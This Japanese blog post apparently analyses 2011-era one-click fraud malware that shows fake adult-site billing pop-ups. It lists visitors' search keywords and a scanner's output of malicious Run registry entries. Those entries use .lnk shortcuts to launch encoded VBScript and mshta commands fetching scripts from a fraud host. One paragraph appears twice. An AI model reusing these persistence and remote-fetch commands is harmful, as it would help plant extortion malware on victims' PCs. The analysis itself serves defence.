[AV サイト 有料 登録 請求] [POP 消えない] [「有料アダルトサイトへご入会ありがとうございます」の表示が消えない] [えっち動画 ウインドウ] [えろサイト 有料 詐欺 削除] [アダルトサイト登録画面 削除] [アダルト動画,消去法] [アダルト請求画面削除] [ウイルス アダルト ワンクリ詐欺 削除方法] [エッチなウインドウの削除] [エロ 消す] [エロサイト 会員登録] [パソコン 振り込め詐欺 対処法] [ワンクリック 架空請求 ポップアップ] [ワンクリック請求画面 削除 ] [不正入会 解除] [動画サイトの会員登録] [有料アダルトサイト 表示 無効] [有料サイト ポップサイト 解除] [消えない画像の消し方] [無料pc画面の削除] [起動時 アダルトサイト 利用案内表示] [起動時に有料サイト] ・・・
この一覧は、2012年1月1日に↓のページへ検索エンジン経由でアクセスしてきた方の検索キーワードの一部です。
> http://tech.g1.xrea.com/notes/registry-task.htm
> http://tech.g1.xrea.com/notes/registry-task.htm
新年早々、アダルト動画エロサイトを装ったワンクリック詐欺サイトにて自らウイルスを手動で起動しパソコンに感染させ、請求登録ポップアップ画像がデスクトップ画面からサッパリ消えない状況になっちゃってー・・・。 

◆ 2011年ワンクリウェアウイルス界
去年2011年にはワンクリウェアウイルスの感染挙動として、新たにショートカットファイル(.lnk)を投下するタイプが現れました。レジストリから不正なデータを見つけるのに「mshta」というのがキーポイントになってたんですが、ショートカットファイルを使うことでそこを表面上覆い隠して素人目でなかなか見つけ辛くなってます。
去年2011年にはワンクリウェアウイルスの感染挙動として、新たにショートカットファイル(.lnk)を投下するタイプが現れました。レジストリから不正なデータを見つけるのに「mshta」というのがキーポイントになってたんですが、ショートカットファイルを使うことでそこを表面上覆い隠して素人目でなかなか見つけ辛くなってます。

まず悪用の元祖がこれ。
レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
1 つのデータを確認しました [2012/01/01]
【キー1】
名前: nain(Extcute)
データ: "C:\Users\[ユーザー名]\AppData\Roaming\EBookSys\Extcute.lnk"
└ C:\Users\[ユーザー名]\AppData\Roaming\aicon\appMgr2.exe //B //E:VBScript.Encode "C:\Users\[ユーザー名]\AppData\Roaming\Winamp\Facility827JkV.ssh"
怪しさ ⇒ 10 ポイント
更新日時 ⇒ .lnk ファイル要確認 2012/01/01
■ ■ ■ ■ ■ ■ ■ ■ ■ ■
OS環境: Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe v111217
http://blogs.yahoo.co.jp/noooo_spam/59949792.html
■ ■ ■ ■ ■ ■ ■ ■ ■ ■
その次に来た別種がこれ。
レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
2 つのデータを確認しました [2012/01/01]
【キー2】
名前: SystemBoot2I1jfAsddKPYgYFTOrjYSXgEumsoxJGF
データ: C:\Users\[ユーザー名]\UserProfile\SystemBoot.lnk
└ C:\Users\[ユーザー名]\UserProfile\htmlapp.exe h**p://teens-porn.info/reg2.php?cccid=2I1jfAsddKPYgYFTOrjYSXgEumsoxJGF
怪しさ ⇒ 0 ポイント
更新日時 ⇒ .lnk ファイル要確認 2012/01/01
【キー1】
名前: RegWrite2I1jfAsddKPYgYFTOrjYSXgEumsoxJGF
データ: C:\Users\[ユーザー名]\SoftRecovery\RegWrite.lnk
└ C:\Windows\System32\mshta.exe h**p://teens-porn.info/set_inf2.php?cccid=2I1jfAsddKPYgYFTOrjYSXgEumsoxJGF
怪しさ ⇒ 20 ポイント
更新日時 ⇒ .lnk ファイル要確認 2012/01/01
■ ■ ■ ■ ■ ■ ■ ■ ■ ■
OS環境: Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe v111217
http://blogs.yahoo.co.jp/noooo_spam/59949792.html
■ ■ ■ ■ ■ ■ ■ ■ ■ ■